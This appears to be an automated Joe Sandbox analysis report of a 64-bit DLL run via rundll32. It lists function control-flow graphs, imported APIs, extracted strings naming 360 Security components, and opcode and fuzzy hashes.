                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:0.1%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:2.6%
                                                                                                  Total number of Nodes:38
                                                                                                  Total number of Limit Nodes:1
                                                                                                  execution_graph 46848 180004844 46858 18001ae64 46848->46858 46850 18000485e 46851 180004875 46850->46851 46852 180004870 46850->46852 46856 1800048a7 46851->46856 46868 180004638 523 API calls 46851->46868 46867 18005b1fc 213 API calls 46852->46867 46855 180004885 46855->46856 46869 1800048cc 47 API calls 46855->46869 46859 18001ae7f 46858->46859 46870 180068010 46859->46870 46861 18001aec9 46861->46850 46862 18001af09 46885 1800681d0 62 API calls std::_XGetLastError 46862->46885 46864 18001aec5 std::exception_ptr::exception_ptr 46864->46861 46864->46862 46884 18001ad50 memmove _CxxThrowException RaiseException ?terminate@ 46864->46884 46865 18001af0f 46867->46851 46868->46855 46869->46856 46871 180074740 46870->46871 46872 1800747e3 KiUserExceptionDispatcher 46871->46872 46873 180074789 46871->46873 46876 18007481e 46871->46876 46875 18007484d 46872->46875 46886 1800744f0 13 API calls std::_XGetLastError 46873->46886 46875->46864 46878 180074848 46876->46878 46879 18007483e Sleep 46876->46879 46877 18007479c 46881 1800747f7 46877->46881 46882 1800747a1 GetProcAddress 46877->46882 46878->46875 46880 180074880 SetLastError 46878->46880 46879->46876 46880->46875 46881->46876 46882->46881 46883 1800747b9 46882->46883 46883->46872 46885->46865 46886->46877 46887 180078460 46888 180078498 __GSHandlerCheckCommon 46887->46888 46889 1800784c4 46888->46889 46891 180070210 46888->46891 46892 180070227 46891->46892 46892->46892 46893 18007025b VirtualAlloc 46892->46893 46894 180070280 46893->46894 46894->46889

                                                                                                  Executed Functions

                                                                                                  Function 0000000180070044 Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 179memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID: &$58$KYZi$MhGL$k$o0+X$t!
                                                                                                  • API String ID: 4275171209-455283310
                                                                                                  • Opcode ID: 1d3f5de679e9be7a7fe53fc895b5663e74619cb245d1804fb0228fdac3198365
                                                                                                  • Instruction ID: 0e931260a18899616fd0cd13b7456a36469c7a130b0b511a481734c725122d66
                                                                                                  • Opcode Fuzzy Hash: 1d3f5de679e9be7a7fe53fc895b5663e74619cb245d1804fb0228fdac3198365
                                                                                                  • Instruction Fuzzy Hash: 9E712272701788C6EB6ACF25E044B9E7BB1F348BC8FA59115EE4927B55DA3EC609C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800701F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID: &$58
                                                                                                  • API String ID: 4275171209-292207594
                                                                                                  • Opcode ID: 4f173b11b85c9be10da8eb9948744f72f75bdffef8083b501ef1bcff6fad96bb
                                                                                                  • Instruction ID: dc3067c45e012cfe901e309ad5e26282e7953dc62dc132df2a3d5b0976b166a3
                                                                                                  • Opcode Fuzzy Hash: 4f173b11b85c9be10da8eb9948744f72f75bdffef8083b501ef1bcff6fad96bb
                                                                                                  • Instruction Fuzzy Hash: 6021263371169886CB6ACF74B158BADABA5B748BC8F1590268F4E17F55C93DD10AC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800701E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID: &$58
                                                                                                  • API String ID: 4275171209-292207594
                                                                                                  • Opcode ID: 11a750e4170a9ad4c562e75150ed66c3a2dc3f508a0205cd01daf590c50fbe37
                                                                                                  • Instruction ID: 23527d6a8d6615ab95d8207fcdc7229d218c2df4260ae3193873eea517917a3c
                                                                                                  • Opcode Fuzzy Hash: 11a750e4170a9ad4c562e75150ed66c3a2dc3f508a0205cd01daf590c50fbe37
                                                                                                  • Instruction Fuzzy Hash: 0421233271179486CB6ACF35A158FADABA5B718BC8F169016CF8E17F55C93DD109C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180070200 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 68memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID: &$58
                                                                                                  • API String ID: 4275171209-292207594
                                                                                                  • Opcode ID: a6f1ea9488f9dd4da2db5fb67a2fd5314731c71e78e17318f66e63a2c9041829
                                                                                                  • Instruction ID: d87006d348cf916555d4c40589e898ccdcab4414593187567b45beb92d847496
                                                                                                  • Opcode Fuzzy Hash: a6f1ea9488f9dd4da2db5fb67a2fd5314731c71e78e17318f66e63a2c9041829
                                                                                                  • Instruction Fuzzy Hash: 5421333271139886CB6ACF74A158FADABA1B708BC4F169115CE8E17F06C93DD109C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180070210 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 62memoryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 75 180070210-180070224 76 180070227-180070259 75->76 76->76 77 18007025b-18007027a VirtualAlloc 76->77 78 1800704e7-1800704fc 77->78 79 180070280-1800702a2 77->79 80 1800702a4-1800702aa 79->80 81 1800702c0-1800702e0 79->81 83 1800702ad-1800702be 80->83 81->78 84 1800702e6-1800702ea 81->84 83->81 83->83
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID: &$58
                                                                                                  • API String ID: 4275171209-292207594
                                                                                                  • Opcode ID: b6a3a98d28c9259cb78a12b48d44ca555a7ad990dfd794d5708a1868dd1c73ff
                                                                                                  • Instruction ID: cbf57c0b74e788f2119e0e4766543ca7679dc5ca0df739001d034443fdc2105d
                                                                                                  • Opcode Fuzzy Hash: b6a3a98d28c9259cb78a12b48d44ca555a7ad990dfd794d5708a1868dd1c73ff
                                                                                                  • Instruction Fuzzy Hash: 4021F07231139886CA69CF75A248FA9ABA5B708BC4F1691158F8E27F45CA3DE10AC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018001AE64 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLaststd::_std::exception_ptr::exception_ptr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1155811620-0
                                                                                                  • Opcode ID: 2a9c38afd83d8c400890383e43e41c3aafc3bdcb764982a53af39c40d3923482
                                                                                                  • Instruction ID: 389c6b3ebaf6b75f4d52dadf3eb5adb451314a2da240c59f195eb1b860b11b29
                                                                                                  • Opcode Fuzzy Hash: 2a9c38afd83d8c400890383e43e41c3aafc3bdcb764982a53af39c40d3923482
                                                                                                  • Instruction Fuzzy Hash: 6A115171B00B0999FB82DBA0DC853DD37B4A7493A8F504616FA29566D6DF20C78DC340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions

                                                                                                  Function 00000001800033E0 Relevance: 95.4, APIs: 52, Strings: 2, Instructions: 931filememoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Read$memset$Pointer$ErrorFreeHandleLastTask$AllocCloseCreateInformationLibrary
                                                                                                  • String ID: MsiDecomposeDescriptorW$\msi.dll
                                                                                                  • API String ID: 4003554184-1492151253
                                                                                                  • Opcode ID: 972d651acb62f33e8e3804cad28843b724857f095e39e40b9a4eb7dc09eaf4cb
                                                                                                  • Instruction ID: 6edc26f3f0b57b9798bafb549a2288c124352e2b3efb4315e33b70b2a8a600e5
                                                                                                  • Opcode Fuzzy Hash: 972d651acb62f33e8e3804cad28843b724857f095e39e40b9a4eb7dc09eaf4cb
                                                                                                  • Instruction Fuzzy Hash: 93928F7270465886EBA6DF26D8443ED33A5F749BE4F448226FA694BBD4DF38C648C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004A650 Relevance: 79.3, APIs: 37, Strings: 8, Instructions: 513filesleepmemoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 410 18004a650-18004a6ac 411 18004a6c7-18004a6ce 410->411 412 18004a6ae 410->412 414 18004a6e2-18004a6e9 411->414 415 18004a6d0 411->415 413 18004a6b1-18004a6b9 412->413 413->413 416 18004a6bb-18004a6be 413->416 418 18004a6fd-18004a704 414->418 419 18004a6eb 414->419 417 18004a6d3-18004a6db 415->417 416->411 421 18004a6c0-18004a6c2 416->421 417->417 422 18004a6dd-18004a6e0 417->422 420 18004a706-18004a70d 418->420 418->421 423 18004a6ee-18004a6f6 419->423 425 18004a71e 420->425 426 18004a70f 420->426 427 18004a9a0-18004a9c9 call 1800782d0 421->427 422->414 422->421 423->423 424 18004a6f8-18004a6fb 423->424 424->418 424->421 429 18004a721-18004a728 425->429 428 18004a712-18004a71a 426->428 428->428 431 18004a71c 428->431 432 18004a739 429->432 433 18004a72a 429->433 431->429 436 18004a73c-18004a74d 432->436 435 18004a72d-18004a735 433->435 435->435 437 18004a737 435->437 436->421 438 18004a753-18004a786 memset GetModuleFileNameW 436->438 437->436 438->421 439 18004a78c-18004a7cb PathAppendW call 180019044 438->439 442 18004a7e4-18004a7f2 439->442 443 18004a7cd-18004a7d2 439->443 445 18004a805-18004a80b 442->445 446 18004a7f4-18004a7f7 442->446 443->442 444 18004a7d4-18004a7df ShellExecuteExW 443->444 444->427 448 18004a80d-18004a812 445->448 449 18004a83f-18004a848 445->449 446->445 447 18004a7f9-18004a802 446->447 447->445 448->449 450 18004a814-18004a81d 448->450 449->421 451 18004a84e-18004a855 call 180018e8c 449->451 450->451 452 18004a81f-18004a83d 450->452 455 18004a857-18004a865 call 18006998c 451->455 456 18004a86b-18004a877 451->456 452->451 455->421 455->456 457 18004a882-18004a891 456->457 458 18004a879-18004a87f ILGetSize 456->458 461 18004a8a3-18004a8b9 GetTickCount srand 457->461 462 18004a893-18004a89e 457->462 458->457 463 18004a8d9-18004a8eb call 18000a7ac 461->463 464 18004a8bb-18004a8d3 GetCurrentProcess GetProcessId 461->464 462->461 467 18004ae75-18004ae7f call 18000a540 463->467 468 18004a8f1-18004a94b GetCurrentThreadId rand call 18000cf30 463->468 464->463 474 18004a951-18004a962 LocalAlloc 468->474 475 18004aa2b-18004aa5f CreateFileMappingW 468->475 476 18004a964-18004a977 InitializeSecurityDescriptor 474->476 477 18004a97f-18004a981 474->477 478 18004aa64-18004aa67 475->478 479 18004a979 LocalFree 476->479 480 18004a9ca-18004a9de SetSecurityDescriptorDacl 476->480 481 18004a983-18004a992 477->481 478->477 482 18004aa6d-18004aa90 MapViewOfFile 478->482 479->477 487 18004a9e5-18004aa29 CreateFileMappingW LocalFree 480->487 488 18004a9e0-18004a9e3 480->488 485 18004a994-18004a997 481->485 486 18004a99e 481->486 483 18004aaa2-18004aac4 memset 482->483 484 18004aa92-18004aa9d CloseHandle 482->484 489 18004aac6-18004aadb 483->489 490 18004aade-18004aae7 483->490 484->477 485->486 486->427 487->478 488->479 489->490 491 18004ab18-18004ab1c 490->491 492 18004aae9-18004aafc 490->492 494 18004ab74-18004ab78 491->494 495 18004ab1e-18004ab2e 491->495 493 18004ab00-18004ab11 492->493 493->493 496 18004ab13 493->496 499 18004abd6-18004abdc 494->499 500 18004ab7a-18004ab8a 494->500 497 18004ab54-18004ab71 memmove 495->497 498 18004ab30-18004ab51 memmove 495->498 496->491 497->494 498->497 501 18004abde-18004abf1 499->501 502 18004ac10-18004ac14 499->502 503 18004abb8-18004abd1 memmove 500->503 504 18004ab8c-18004abb3 memmove 500->504 505 18004abf8-18004ac09 501->505 506 18004ac16-18004ac29 502->506 507 18004ac48-18004ac83 502->507 503->499 504->503 505->505 508 18004ac0b 505->508 509 18004ac30-18004ac41 506->509 510 18004aca5-18004acb1 UnmapViewOfFile 507->510 511 18004ac85-18004ac9b memmove 507->511 508->502 509->509 512 18004ac43 509->512 513 18004acd5-18004ad0e memset 510->513 514 18004acb3-18004acca FindWindowW 510->514 511->510 512->507 516 18004ad17-18004ad5a wsprintfW memset 513->516 517 18004ad10 513->517 514->513 515 18004accc-18004accf SetForegroundWindow 514->515 515->513 518 18004ad92-18004adc6 call 18004b1a4 516->518 519 18004ad5c-18004ad90 call 180049f94 516->519 517->516 525 18004adc8-18004adde call 18004bbb8 518->525 526 18004ade9-18004ae0f 518->526 524 18004ade3-18004ade7 519->524 524->526 525->524 528 18004ae11-18004ae18 526->528 529 18004ae43-18004ae4a 526->529 532 18004ae1a-18004ae27 WaitForSingleObject 528->532 533 18004ae2b-18004ae2d 528->533 530 18004ae52-18004ae59 529->530 531 18004ae4c CloseHandle 529->531 534 18004ae61-18004ae70 CloseHandle 530->534 535 18004ae5b CloseHandle 530->535 531->530 532->529 536 18004ae29 532->536 533->530 537 18004ae2f-18004ae34 Sleep 533->537 534->481 535->534 538 18004ae3a-18004ae3e call 18004ae80 536->538 537->538 538->529
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Filememmove$CloseHandlememset$Local$CreateCurrentDescriptorFreeMappingProcessSecurityViewWindow$AllocAppendCountDaclExecuteFindForegroundInitializeModuleNameObjectPathShellSingleSizeSleepThreadTickUnmapWaitrandsrandwsprintf
                                                                                                  • String ID: %u_%d_%d_%d_%u$..\360DeskAna64.exe$/%s %s %u$Progman$Program manager$open$se1$se2
                                                                                                  • API String ID: 1121195023-828389715
                                                                                                  • Opcode ID: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
                                                                                                  • Instruction ID: 9c018b3ec5208d5dc303fe800ce77a7618bf785d2afa65f14d01c037d361c4e0
                                                                                                  • Opcode Fuzzy Hash: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
                                                                                                  • Instruction Fuzzy Hash: D332CC72604B8886FB96CF25D8803DD73B1F789BD8F528116EA5947BA4DF38C649C708
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800655A8 Relevance: 68.6, APIs: 28, Strings: 11, Instructions: 339libraryloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 540 1800655a8-1800655f2 541 1800655f4-1800655f8 540->541 542 180065610-18006561f 540->542 545 180065608-18006560b 541->545 546 1800655fa-180065602 541->546 543 180065621-18006562d EnterCriticalSection 542->543 544 180065632-180065636 542->544 543->544 548 180065638-18006563c 544->548 549 180065652-18006565d call 18000a7ac 544->549 547 180065ab3-180065ae5 call 1800782d0 545->547 546->545 546->547 550 18006563e-180065648 548->550 551 18006564a 548->551 558 180065ae6-180065af3 call 18000a540 549->558 559 180065663-1800656e3 memset GetModuleFileNameW PathAppendW StrStrIW call 18000a354 549->559 550->551 554 18006564d 550->554 551->554 557 180065aa8-180065aab 554->557 557->547 560 180065aad LeaveCriticalSection 557->560 566 1800656e5-1800656e7 559->566 567 1800656e9 PathFileExistsW 559->567 560->547 568 1800656ef-1800656fa 566->568 567->568 570 180065711-18006572d PathAppendW call 18000a354 568->570 571 1800656fc-1800656ff 568->571 577 180065733 PathFileExistsW 570->577 578 18006572f-180065731 570->578 572 180065702-18006570a 571->572 572->572 574 18006570c 572->574 576 180065803-180065810 call 180005498 574->576 581 180065815-18006581e 576->581 580 180065739-180065740 577->580 578->580 583 180065742 580->583 584 180065769-1800657ba memset SHGetValueW 580->584 586 180065888-1800658d6 call 1800055b8 GetModuleFileNameW PathAppendW call 18000a354 581->586 587 180065820-180065846 call 18000525c call 180065af4 581->587 585 180065745-18006574d 583->585 584->581 588 1800657bc-1800657d0 PathAppendW 584->588 585->585 589 18006574f-180065764 call 180005498 585->589 605 1800658d8-1800658da 586->605 606 1800658dc PathFileExistsW 586->606 607 180065848-180065851 LoadLibraryW 587->607 608 180065855-18006585c 587->608 588->581 591 1800657d2-1800657e1 call 18000a354 588->591 589->581 603 1800657e7 PathFileExistsW 591->603 604 1800657e3-1800657e5 591->604 609 1800657ed-1800657ef 603->609 604->609 610 1800658e2-1800658e9 605->610 606->610 607->608 611 180065884 608->611 612 18006585e-180065880 GetProcAddress * 2 608->612 609->581 614 1800657f1-1800657f6 609->614 616 180065900-18006591c PathAppendW call 18000a354 610->616 617 1800658eb-1800658ee 610->617 611->586 612->611 618 1800657f9-180065801 614->618 624 180065922 PathFileExistsW 616->624 625 18006591e-180065920 616->625 619 1800658f1-1800658f9 617->619 618->576 618->618 619->619 621 1800658fb 619->621 623 1800659f3-180065a00 call 180005498 621->623 630 180065a05-180065a0e 623->630 626 180065928-18006592f 624->626 625->626 628 180065958-1800659aa memset SHGetValueW 626->628 629 180065931 626->629 628->630 635 1800659ac-1800659c0 PathAppendW 628->635 632 180065934-18006593c 629->632 633 180065a74-180065a7c 630->633 634 180065a10-180065a36 call 18000525c call 180065af4 630->634 632->632 636 18006593e-180065953 call 180005498 632->636 639 180065a84 633->639 640 180065a7e-180065a82 633->640 654 180065a38-180065a41 LoadLibraryW 634->654 655 180065a45-180065a4c 634->655 635->630 638 1800659c2-1800659d1 call 18000a354 635->638 636->630 651 1800659d7 PathFileExistsW 638->651 652 1800659d3-1800659d5 638->652 641 180065a87-180065a96 639->641 640->639 640->641 645 180065a98-180065aa2 641->645 646 180065aa3 641->646 645->646 646->557 656 1800659dd-1800659df 651->656 652->656 654->655 655->633 658 180065a4e-180065a70 GetProcAddress * 2 655->658 656->630 657 1800659e1-1800659e6 656->657 660 1800659e9-1800659f1 657->660 658->633 660->623 660->660
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Path$File$AppendExists$AddressProc$memset$CriticalLibraryLoadModuleNameSectionSleepValue$EnterHeapLeaveProcess
                                                                                                  • String ID: ..\..\360base64.dll$..\..\360conf64.dll$..\360base64.dll$..\360conf64.dll$360base64.dll$360conf64.dll$CreateObject$InitLibs$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$\deepscan\360base64.dll$path
                                                                                                  • API String ID: 915540683-2864068223
                                                                                                  • Opcode ID: bdcb2047be7a0d43f9a5865a595f44413cc4095ddd18bc437aaa25b8a2dbd945
                                                                                                  • Instruction ID: d884d170d7a5308d36e8fcb93366518d72040e1886450bd247f02bd6a7684e11
                                                                                                  • Opcode Fuzzy Hash: bdcb2047be7a0d43f9a5865a595f44413cc4095ddd18bc437aaa25b8a2dbd945
                                                                                                  • Instruction Fuzzy Hash: 8EF17035214B4C92EA92DF25E8403DA73A2F78CBD5F549215FAAA436A4EF38C74DC740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180010580 Relevance: 61.5, APIs: 25, Strings: 10, Instructions: 237registryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 661 180010580-180010624 memset GetModuleFileNameW memset RegOpenKeyExW 662 180010961 661->662 663 18001062a-18001067b RegQueryValueExW RegCloseKey 661->663 666 180010963-18001098e call 1800782d0 662->666 664 180010691-180010698 663->664 665 18001067d-18001068a PathAddBackslashW 663->665 668 18001069c-1800106a3 664->668 665->664 668->668 670 1800106a5-1800106a8 668->670 670->662 671 1800106ae-1800106b1 670->671 671->662 672 1800106b7-1800106d0 StrCmpNIW 671->672 673 1800106d6-180010711 memset call 18000d328 672->673 674 18001095d-18001095f 672->674 677 1800107d8-18001080c memset call 18000d328 673->677 678 180010717-180010724 PathFileExistsW 673->678 674->666 677->674 684 180010812-18001081f PathFileExistsW 677->684 678->677 679 18001072a-18001075e memset call 18000d328 678->679 686 180010764-18001076f PathFileExistsW 679->686 687 180010760-180010762 679->687 684->674 685 180010825-180010859 memset call 18000d328 684->685 692 180010958 685->692 693 18001085f-18001086c PathFileExistsW 685->693 689 180010771-1800107a5 memset call 18000d328 686->689 687->689 696 1800107c7-1800107d3 689->696 697 1800107a7-1800107b4 PathFileExistsW 689->697 692->674 693->692 695 180010872-1800108ac memset RegOpenKeyExW 693->695 698 180010905-18001093b memset call 18000d328 695->698 699 1800108ae-1800108f8 RegQueryValueExW RegCloseKey 695->699 696->674 697->696 700 1800107b6-1800107c2 697->700 704 18001094c-180010956 698->704 705 18001093d-18001094a PathFileExistsW 698->705 699->698 701 1800108fa-1800108ff PathAddBackslashW 699->701 700->674 701->698 704->674 705->704
                                                                                                  APIs
                                                                                                  Strings
